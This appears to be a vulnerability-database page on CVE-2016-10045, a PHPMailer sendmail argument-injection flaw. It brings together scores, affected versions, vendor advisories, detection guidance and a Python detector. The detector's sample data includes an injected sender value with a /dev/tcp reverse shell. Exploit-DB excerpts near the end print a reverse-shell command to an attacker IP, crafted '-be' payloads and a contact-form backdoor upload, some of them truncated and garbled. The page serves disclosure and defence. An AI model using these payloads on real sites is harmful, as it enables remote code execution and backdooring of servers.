CVE-2016-10045
Published 2016-12-30. CVE-2016-10045: The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary…
Priority P182 · critical 9.8 · CVSS 3.1 · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available · EPSS 98.04% (99.9th percentile)
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-phpmailer | — | — |
| joomla | joomla_! | 1.5.0 – 3.6.5 | — |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.18 | 5.2.18 |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.20 | 5.2.20 |
| phpmailer_project | phpmailer | < 5.2.20 | 5.2.20 |
| wordpress | wordpress | <= 4.7 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP POST requests to contact form endpoints where the email field contains `-be` (Exim/sendmail argument injection flag) combined with `/dev/tcp/` reverse shell strings — indicative of active exploitation.
- The Metasploit module for this CVE writes a payload file to the web root and then triggers it via HTTP request; detect unexpected new PHP files appearing in the web root combined with outbound connections from the web server process.
- The vulnerability stems from improper interaction between escapeshellarg and PHP's internal mail() escaping; audit PHPMailer versions below 5.2.20 using isMail transport for unpatched deployments.
- CVE-2016-10045 exists specifically because the patch for CVE-2016-10033 was incomplete; systems patched only to PHPMailer 5.2.18/5.2.19 remain vulnerable — the fix requires 5.2.20 or later.
- Only the isMail transport (using PHP's built-in mail() function) is affected; SMTP transport is not vulnerable to this argument injection vector.
- Exploitation requires the web server user running PHPMailer to have write access to the web root directory for the file-drop technique used by the Metasploit module.
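Detection logic for the two observations above (a sendmail option injected after an escaped quote in the sender field, and the version ranges in which the fix is absent or incomplete), as an added Python example that is not code from this page or from the PHPMailer project; the submissions it scans and the 203.0.113.9 address are constructed sample data, and the injection pattern generalises to any dash option following an escaped quote, not only `-be`.

```python
import re
from typing import Dict, List, Tuple

# Sendmail-style option injected right after a backslash-escaped quote in the
# sender address. The CVE-2016-10033 shape escapes a double quote (\" -be), the
# CVE-2016-10045 bypass escapes a single quote (\' -be); both match here, as
# does any other dash option, not only -be.
ARG_INJECTION = re.compile(r'\\["\']\s+-[A-Za-z]')
# Bash reverse-shell marker named in the detection guidance above.
REVERSE_SHELL = re.compile(r'/dev/tcp/')
# Deliberately strict, heuristic address shape: no whitespace, quotes or backslashes.
SAFE_ADDRESS = re.compile(r'[^\s"\'\\@]+@[^\s"\'\\@]+\.[A-Za-z]{2,}')

# Constructed contact-form submissions (URL-decoded POST fields), made up for this example.
SAMPLE_SUBMISSIONS: List[Dict[str, str]] = [
    {"path": "/contact.php", "email": "alice@example.org", "msg": "hello"},
    {"path": "/contact.php", "email": '"a\\" -be /dev/tcp/203.0.113.9/4444 "@a.co', "msg": "x"},
    {"path": "/contact.php", "email": "\"a\\' -be /tmp/x \"@a.co", "msg": "x"},
    {"path": "/contact.php", "email": "bob+news@example.com", "msg": "ok"},
]


def classify_sender(email: str) -> List[str]:
    """Return the detection labels that fire on one sender/email field value."""
    findings = []
    if ARG_INJECTION.search(email):
        findings.append("sendmail-argument-injection")
    if REVERSE_SHELL.search(email):
        findings.append("reverse-shell-marker")
    if not SAFE_ADDRESS.fullmatch(email):
        findings.append("malformed-address")
    return findings


def scan_submissions(submissions: List[Dict[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """Run classify_sender over every submission and keep only those that fired."""
    alerts = []
    for index, sub in enumerate(submissions):
        findings = classify_sender(sub.get("email", ""))
        if findings:
            alerts.append((index, sub.get("path", "?"), findings))
    return alerts


def phpmailer_status(version: str) -> Tuple[bool, str]:
    """Map a PHPMailer version to (vulnerable?, reason) using the ranges on this page:
    below 5.2.18 is open to both CVEs; 5.2.18 and 5.2.19 carry the incomplete fix and
    remain open to CVE-2016-10045; 5.2.20 and later are fixed."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)  # tolerates suffixes such as -1
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(p) for p in match.groups())
    if parts >= (5, 2, 20):
        return False, "fixed"
    if parts >= (5, 2, 18):
        return True, "CVE-2016-10045 (incomplete fix for CVE-2016-10033)"
    return True, "CVE-2016-10033 and CVE-2016-10045"
```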
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | LOW | — |
| vendor_ubuntu | — | 9.8 | CRITICAL | — |
OSV
libphp-phpmailer vulnerability
osv·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL]
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yo
OSV
libphp-phpmailer vulnerabilities
osv·2023-03-15·CVSS 9.8
CVE-2016-10033 [CRITICAL]
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when adding attachments to messages,
which could lead to relative im
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL]
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL]
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] CWE-77
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
OSV
CVE-2016-10045: The isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10045 [CRITICAL]
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Ubuntu
PHPMailer vulnerabilities
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2021-3603 [CRITICAL]
Summary: Several security issues were fixed in PHPMailer.
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when addi
Ubuntu
PHPMailer vulnerability
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL]
Summary: An incomplete fix was discovered in PHPMailer.
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ub
Debian
CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
vendor_debian·2016·CVSS 9.8
CVE-2016-10045 [CRITICAL]
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Scope: local
- bookworm: resolved
- bullseye: resolved
- forky: resolved
- sid: resolved
- trixie: resolved
No detection rules found.
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL]
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL]
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
PHPMailer < 5.2.20 - Remote Code Execution
exploitdb·2016-12-27·CVSS 9.8
CVE-2016-10045 [CRITICAL]
PHPMailer "
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
Exploit-DB
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-1004 [CRITICAL]
PHPMailer 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
writes a payload to the web root of the webserver before then executing
it with an HTTP request. The user running PHPMailer must have write
access to the specified WEB_ROOT directory and successful exploitation
can take a few minutes.
},
'Author' => [
'Dawid Golunski', # vulnerability discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB',
Metasploit
PHPMailer Sendmail Argument Injection
metasploit
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.
Bugzilla
CVE-2016-10045 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-11·CVSS 9.8
CVE-2016-10045 [CRITICAL]
The isMail transport in PHPMailer before 5.2.20, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
References:
http://seclists.org/oss-sec/2016/q4/771
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
Bugzilla
CVE-2016-10033 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL]
A vulnerability was found in PHPMailer. This code is being used in multiple web applications. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/750
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1409494]
Affects: fedora-all [bug 1409495]
Affects: epel-all [bug 1409496]
---
Created wordpress tracking bugs for this issue:
Affects: fedora-all [bug 1409497]
Affects: epel-all [bug 1409498]
---
Created mantis tracking bugs for this issue:
Affects: fedora-all [bug 1409492]
Affe
References
- http://openwall.com/lists/oss-security/2016/12/28/1
- http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html
- http://seclists.org/fulldisclosure/2016/Dec/81
- http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
- http://www.securityfocus.com/archive/1/539967/100/0/threaded
- http://www.securityfocus.com/bid/95130
- http://www.securitytracker.com/id/1037533
- https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html
- https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20
- https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
- https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
- https://www.exploit-db.com/exploits/40969/
- https://www.exploit-db.com/exploits/40986/
- https://www.exploit-db.com/exploits/42221/